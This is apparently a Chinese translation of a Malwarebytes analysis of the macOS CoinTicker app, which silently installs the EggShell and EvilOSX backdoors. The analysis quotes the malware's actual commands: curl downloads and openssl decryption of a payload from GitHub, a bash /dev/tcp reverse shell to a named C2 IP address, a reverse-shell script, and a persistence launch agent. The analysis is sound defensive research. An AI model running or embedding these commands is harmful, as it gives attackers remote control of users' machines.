用户1vladimir在malwarebytes论坛发帖称CoinTicker应用程序在应用设备中安装了2个后门。Malwarebytes研究人员据此进行了深入分析。

应用行为分析

CoinTicker应用是一个合法的应用程序,对投资加密货币的用户来说非常有用,因为应用可以实时显示添加关注的加密货币的价格。应用下载成功安装后,菜单栏会出现一个图标,显示比特币的当前价格信息。

应用可以根据应用中的选项来个性化显示加密货币的种类和其他信息,支持的加密货币有比特币、以太坊和门罗币。

应用程序的功能看起来是合法的,但是应用会在后台悄悄地安装后门——既不向用户请求权限,也不向用户通知任何信息。应用启动后,会下载和安装两个开源后门EvilOSX和EggShell的组件。

应用会执行下面的shell命令来下载一个macOS的个性化编译版EggShell:

nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py

命令的第一部分是从Github页下载一个编码的文件,并以文件名.info.enc保存在/private/tmp/中,然后用openssl将该文件解码为隐藏的python文件.info.py。最后执行生成的python脚本。

.info.py脚本会执行多个不同的任务。首先,用下面的命令打开一个到C2服务器的逆shell连接:
nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1
(域名seednode3.parsicoin.net解析的IP地址)

然后,下载二进制文件EggShell mach-o并保存到/tmp/espl
curl -k -L -o /tmp/espl https://github.com/youarenick/newProject/raw/master/mac

最后,在/tmp/.server.sh处创建和运行shell脚本,脚本会建立一个逆向shell。

#! /bin/bash
nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1

CoinTicker应用还会创建一个用户启动代理.espl.plist,周期性地运行相同的命令:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖